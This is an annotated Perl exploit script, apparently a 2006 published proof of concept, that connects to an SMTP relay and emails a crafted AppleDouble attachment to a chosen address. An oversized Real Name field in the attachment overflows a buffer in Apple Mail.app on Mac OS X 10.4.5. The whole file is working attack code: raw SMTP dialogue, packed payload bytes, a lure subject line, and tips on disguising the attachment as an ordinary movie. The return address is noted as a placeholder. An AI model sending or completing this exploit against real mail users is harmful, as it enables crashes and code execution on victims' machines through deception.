
# Title : Apple Mac OS X 10.4.5 Mail.app (Real Name) Buffer Overflow Exploit
# Published : 2006-03-13
# Author : Kevin Finisterre


#!/usr/bin/perl
#
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
# http://www.digitalmunition.com 
#
# Mail.app Version 2.0.7 (746.2) on OSX 10.4.5 Build 8H14 + Security Update 2006-001 (PowerPC) v1.0
#
# RFC-1740 MIME-based Mac file buffer overflow
# 
# AppleSingle/AppleDouble file header as described in RFC 1740 (this script sends
# an AppleDouble part, magic 0x00051607). All multi-byte fields are big-endian
# and entry offsets are counted from the start of the file:
# [4 byte magic number][4 byte version number][16 bytes of filler][2 byte number of entries][Entry...]
# Entry descriptor for each Entry (12 bytes each, directly after the 26-byte header):
# [4 byte entry id][4 byte offset][4 byte length]
# Real Name entry id is 0x03, Finder Info is 0x09 and Resource Fork is 0x02.
# The oversized Real Name entry is the field that triggers the overflow.
#
# If this exploit is not working, clear out your ~/Library/Mail Downloads folder
# (presumably a previously decoded copy of the attachment gets reused otherwise).
#
# ./SuperTastey.pl mx.yourhost.com yourmac@someplace.com
#
use IO::Socket;
use MIME::Base64;
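# Command line: the MX host that will relay the message and the victim's address.
die "usage: $0 <mx host> <target address>\n" unless @ARGV == 2;
my ($hostName, $emailaddy) = @ARGV;

# Plain SMTP on port 25 -- no TLS and no authentication. The commands below are
# pushed through without reading any server reply, so this relies on the relay
# accepting the pipelined dialogue as-is (the published script did the same).
my $sock = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => $hostName,
    PeerPort => 25,
    Type     => SOCK_STREAM,
) or die "no socket: $!\n";

# SMTP envelope followed by the message headers. EHLO name and MAIL FROM are
# hard-coded; MAIL FROM has to be something the relay in use will accept, and
# only the RCPT TO (the envelope recipient) carries the target address -- the
# To: header is cosmetic and left as published.
print $sock "EHLO [192.168.1.7]\r\n" .
    "MAIL FROM:<root>\r\n" .
    "RCPT TO:<$emailaddy>\r\n" .
    "DATA\r\n" .
    "Mime-Version: 1.0 (Apple Message framework v746.2)\r\n" .
    "To: kfinisterre\@blah.com\r\n" .
    # The closing '>' of the Message-Id was missing in the published script;
    # an unterminated msg-id is malformed per RFC 2822.
    "Message-Id: <1AE65A5B-6E3A-479B-8ECB-8BC4D959A69A\@blah.com>\r\n" .
    "Content-Type: multipart/mixed; boundary=Apple-Mail-3-188295813\r\n" .
    "From: root <root>\r\n" .
    "Subject: Dude you have to see this shit!\r\n" .
    "Date: Mon, 6 Mar 2006 23:04:12 -0500\r\n" .
    "X-Mailer: Apple Mail (2.746.2)\r\n" .
    "\r\n" .
    "\r\n" .
    # Outer part: multipart/appledouble, i.e. an AppleDouble header part followed
    # by the data-fork part, both inside the Apple-Mail-4 boundary.
    "--Apple-Mail-3-188295813\r\n" .
    "Content-Type: multipart/appledouble;\r\n" .
    "\tboundary=Apple-Mail-4-188295813\r\n" .
    "Content-Disposition: attachment\r\n" .
    "\r\n" .
    "\r\n" .
    # First inner part: the AppleDouble header file (base64 body is sent later).
    # The long name= / filename*1= values are padding of the MIME-level names;
    # the overflow itself is in the Real Name entry inside the AppleDouble data.
    "--Apple-Mail-4-188295813\r\n" .
    "Content-Transfer-Encoding: base64\r\n" .
    "Content-Type: application/applefile;\r\n" .
    "\tname=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.mov\"\r\n" .
    "Content-Disposition: attachment;\r\n" .
    "\tfilename*1=CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC.mov\r\n" .
    "\r\n"
    or die "send failed: $!\n";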

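# Value that lands at the overwrite position inside the Real Name. The author's
# note: the spec says the name is printable ASCII, hence "ABCD" (0x41424344).
# NOTE(review): as published this is a placeholder, not a real address, so the
# script is a crash PoC unless a usable value is substituted here.
my $retaddr = "\x41\x42\x43\x44";

# Resource fork blob lifted from Metasploit (author: "No fscking clue what this
# is ... I think its just a resource fork"). It carries the path string
# "/Applications/Utilities/Terminal.app" and what looks like icon pixel data.
# It is not the part that overflows and is reproduced byte for byte (1337 bytes).
my $rsrc_fork =
    "\x00\x01\x00\x00\x00\x05\x08\x00\x00\x04\x08\x00\x00\x00\x32\x00" .
    ("\x00" x 240) .
    "\x00\x04\x04\x00\x00\x00\x25\x2f\x41\x70\x70\x6c\x69" .
    "\x63\x61\x74\x69\x6f\x6e\x73\x2f\x55\x74\x69\x6c\x69\x74\x69\x65" .
    "\x73\x2f\x54\x65\x72\x6d\x69\x6e\x61\x6c\x2e\x61\x70\x70\x00\xec" .
    "\xec\xec\xff\xec\xec\xec\xff\xec\xec\xec\xff\xec\xec\xec\xff\xec" .
    "\xec\xec\xff\xec\xec\xec\xff\xe1\xe1\xe1\xff\xe1\xe1\xe1\xff\xe1" .
    "\xe1\xe1\xff\xe1\xe1\xe1\xff\xe1\xe1\xe1\xff\xe1\xe1\xe1\xff\xe1" .
    "\xe1\xe1\xff\xe1\xe1\xe1\xff\xe6\xe6\xe6\xff\xe6\xe6\xe6\xff\xe6" .
    "\xe6\xe6\xff\xe6\xe6\xe6\xff\xe6\xe6\xe6\xff\xe6\xe6\xe6\xff\xe6" .
    "\xe6\xe6\xff\xe6\xe6\xe6\xff\xe9\xe9\xe9\xff\xe9\xe9\xe9\xff\xe9" .
    "\xe9\xe9\xff\xe9\xe9\xe9\xff\xe9\xe9\xe9\xff\xe9\xe9\xe9\xff\xe9" .
    "\xe9\xe9\xff\xe9\xe9\xe9\xff\xec\xec\xec\xff\xec\xec\xec\xff\xec" .
    "\xec\xec\xff\xec\xec\xec\xff\xec\xec\xec\xff\xec\xec\xec\xff\xec" .
    "\xec\xec\xff\xec\xec\xec\xff\xef\xef\xef\xff\xef\xef\xef\xff\xef" .
    "\xef\xef\xff\xef\xef\xef\xff\xef\xef\xef\xff\xef\xef\xef\xff\xef" .
    "\xef\xef\xff\xef\xef\xef\xff\xf3\xf3\xf3\xff\xf3\xf3\xf3\xff\xf3" .
    "\xf3\xf3\xff\xf3\xf3\xf3\xff\xf3\xf3\xf3\xff\xf3\xf3\xf3\xff\xf3" .
    "\xf3\xf3\xff\xf3\xf3\xf3\xff\xf6\xf6\xf6\xff\xf6\xf6\xf6\xff\xf6" .
    "\xf6\xf6\xff\xf6\xf6\xf6\xff\xf6\xf6\xf6\xff\xf6\xf6\xf6\xff\xf6" .
    "\xf6\xf6\xff\xf6\xf6\xf6\xff\xf8\xf8\xf8\xff\xf8\xf8\xf8\xff\xf8" .
    "\xf8\xf8\xff\xf8\xf8\xf8\xff\xf8\xf8\xf8\xff\xf8\xf8\xf8\xff\xf8" .
    "\xf8\xf8\xff\xf8\xf8\xf8\xff\xfc\xfc\xfc\xff\xfc\xfc\xfc\xff\xfc" .
    "\xfc\xfc\xff\xfc\xfc\xfc\xff\xfc\xfc\xfc\xff\xfc\xfc\xfc\xff\xfc" .
    "\xfc\xfc\xff\xfc\xfc\xfc\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" .
    ("\xff" x 48) .
    "\xff\xff\xff\xff\xff\xff\xa8\x00\x00\x00\xa8\x00\x00\x00\xa8\x00" .
    "\x00\x00\xa8\x00\x00\x00\xa8\x00\x00\x00\xa8\x00\x00\x00\xa8\x00" .
    "\x00\x00\xa8\x00\x00\x00\x2a\x00\x00\x00\x2a\x00\x00\x00\x2a\x00" .
    "\x00\x00\x2a\x00\x00\x00\x2a\x00\x00\x00\x2a\x00\x00\x00\x2a\x00" .
    "\x00\x00\x2a\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x03\x00" .
    "\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x03\x00" .
    "\x00\x00\x03\x00" . ("\x00" x 12) .
    ("\x00" x 496) .
    ("\x00" x 12) . "\x01\x00\x00\x00" .
    "\x05\x08\x00\x00\x04\x08\x00\x00\x00\x32\x00\x5f\xd0\xac\x12\xc2" .
    "\x00\x00\x00\x1c\x00\x32\x00\x00\x75\x73\x72\x6f\x00\x00\x00\x0a" .
    "\x00\x00\xff\xff\x00\x00\x00\x00\x01\x0d\x21\x7c";

# Entry 9 (Finder Info): ten zero bytes right after the descriptors.
my $finder_info = "\x00" x 10;

# Entry 3 (Real Name): the field that overflows. Layout of the 246 bytes built:
#   218 x 'a' | "0000" "1111" "2222" | $retaddr | "3333" | "zzz.mov."
# Author's note: only the first ~11 characters are shown to the user, so a name
# like NakedChicks...mov or SuperTastey...mov (keep the trailing '.') passes as
# an ordinary .mov/.jpg attachment.
# The descriptor below declares 0xf5 = 245 bytes while 246 are built; the three
# descriptors are nonetheless consistent with the 1655-byte total (72 + 245 +
# 1338), i.e. the trailing '.' is accounted to the resource fork rather than to
# the name. Kept exactly as published -- changing it may change the crash.
my $real_name = ("aa" x 109) . "0000" . "1111" . "2222" . $retaddr . "3333" . "zzz.mov.";

# AppleDouble container: 26-byte header, 3 descriptors of 12 bytes (so data
# begins at 26 + 36 = 62 = 0x3e), then the entry data in the declared order.
# Every multi-byte field is big-endian.
my $bufferz =
    pack("N", 0x00051607) .             # AppleDouble magic number
    pack("N", 0x00020000) .             # version 2
    ("\x00" x 16) .                     # filler
    pack("n", 3) .                      # number of entries
    pack("N3", 9, 0x3e,  0x0a)  .       # Finder Info    @ 0x3e, 10 bytes
    pack("N3", 3, 0x48,  0xf5)  .       # Real Name      @ 0x48, 245 bytes declared
    pack("N3", 2, 0x13d, 0x53a) .       # Resource Fork  @ 0x13d, 1338 bytes declared
    $finder_info . $real_name . $rsrc_fork;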

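# Message body: the base64-encoded AppleDouble part, then the data-fork part
# (an equally oversized MIME name plus a 90000-byte filler), the closing MIME
# boundaries and the SMTP end-of-data marker.
# NOTE(review): the filler is one 90000-character line under an 8bit transfer
# encoding, which exceeds the usual SMTP line-length limit; some relays may
# refuse or rewrap it. Left as published.
print $sock encode_base64($bufferz) .
    "\r\n" .
    "--Apple-Mail-4-188295813\r\n" .
    "Content-Transfer-Encoding: 8bit\r\n" .
    "Content-Id: <1A628FD3-CED7-4C69-B5A6-5ABA7AEB2891\@local>\r\n" .
    "Content-Type: video/quicktime;\r\n" .
    "\tx-mac-type=0;\r\n" .
    "\tx-unix-mode=0755;\r\n" .
    "\tx-mac-creator=0;\r\n" .
    "\tname=\"DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD.mov\"\r\n" .
    "Content-Disposition: attachment;\r\n" .
    "\tfilename*0=EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE.mov;\r\n" .
    # Disabled in the published script; kept for reference.
    #"\r\nFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF!\r\n" .
    "\r\n" . ("Z" x 90000) . "\r\n" .
    "--Apple-Mail-4-188295813--\r\n" .
    "\r\n" .
    "--Apple-Mail-3-188295813--\r\n" .
    ".\r\n"
    or die "send failed: $!\n";

# No reply is read from the server; give it a moment to accept the message
# before the connection is torn down.
sleep 2;
close $sock;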
